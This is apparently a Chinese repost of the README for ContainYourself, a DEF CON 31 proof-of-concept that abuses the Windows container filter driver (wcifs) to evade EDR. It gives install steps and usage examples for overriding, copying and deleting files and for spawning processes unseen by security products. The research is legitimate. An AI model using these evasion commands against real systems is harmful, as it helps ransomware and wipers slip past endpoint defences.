关于
DEF CON 31 中提出的 ContainYourself 研究的 POC,该研究滥用 Windows 容器框架来绕过 EDR
幻灯片:
Windows Shellcode 分析的颠覆性进展.pdf
pdf
安装
确保克隆存储库及其子模块:
git clone --recursive git@github.com:deepinstinct/ContainYourself.git
用法
Usage: ContainYourselfPoc.exe [--command]
Valid commands:
--set-reparse [override|link] - Set wcifs reparse tag
--remove-reparse [override|link] - Remove wcifs reparse tag
--override-file - override a file using wcifs
--copy-file - Copy a file using wcifs
--delete-file - Delete a file using wcifs
--create-process - Create process from an image file path using NtCreateUserProcess
Commands arguments:
--source-file - operation full source file (relative to volume only when using with [--copy-file])
--target-file - operation target file (relative to volume)
--source-volume - operation source volume, without a trailing backslash (default is C:)
--target-volume - operation target volume, without a trailing backslash (default is C:)
Examples:
ContainYourselfPoc.exe --set-reparse override --source-file C:\temp\calc.exe --target-file \temp\malware.exe
ContainYourselfPoc.exe --remove-reparse --source-file C:\temp\calc.exe
ContainYourselfPoc.exe --override-file --source-file C:\temp\calc.exe
ContainYourselfPoc.exe --copy-file --source-file temp\document.docx --target-file Documents\document.docx --target-volume E:
ContainYourselfPoc.exe --delete-file --source-file C:\temp\document.docx
免责声明
每个安全产品都能够整合其独特的算法,旨在对抗勒索软件和擦除器威胁。无法保证此概念验证将成功规避所有现有的可用保护解决方案。
项目地址
ContainYourself:【GitHub传送门】
© 版权声明
THE END
暂无评论内容